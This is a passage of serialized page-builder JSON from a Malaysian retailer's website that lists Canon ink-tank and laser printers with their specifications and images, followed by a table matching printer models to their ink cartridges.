2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f95d9d7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23b0d26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"137f63f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"28\",\"right\":\"28\",\"bottom\":\"28\",\"left\":\"28\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e0baf05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c3f6907\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p>\\n\\n<\\/div>\\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f2ce8e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a9b750\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p>\\n\\n<\\/div>\\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2fabcd2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0a62d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\\n\\n<\\/div>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>First Print Out Time (A4): Approx. 6.5 sec<\\/li>\\n \\t<li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n \\t<li>Mobile Printing<\\/li>\\n<\\/ul><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"dfd3898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n\\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 43ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li>\\n \\t<li>FPOT: 6.2secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 2,300 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f0eb648\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p>\\n\\n<\\/div>\\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 38ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 750 - 4,000 pages<\\/li>\\n \\t<li>FPOT: 5.5secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 900 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a7e17a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"13\\\" align=\\\"center\\\">imagePROGRAF PRO-500<\\/td>\\n<td>Maintenance Cartridge MC-20<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Blue)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Chroma Optimizer)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Matte Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Red)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY iB4170<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5070<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5170<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5370<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5470<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E3170<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E410<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\",\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E4270<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E470<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E477<\\/td>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E480<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E510<\\/td>\\n<td>CL-98 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-88 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" 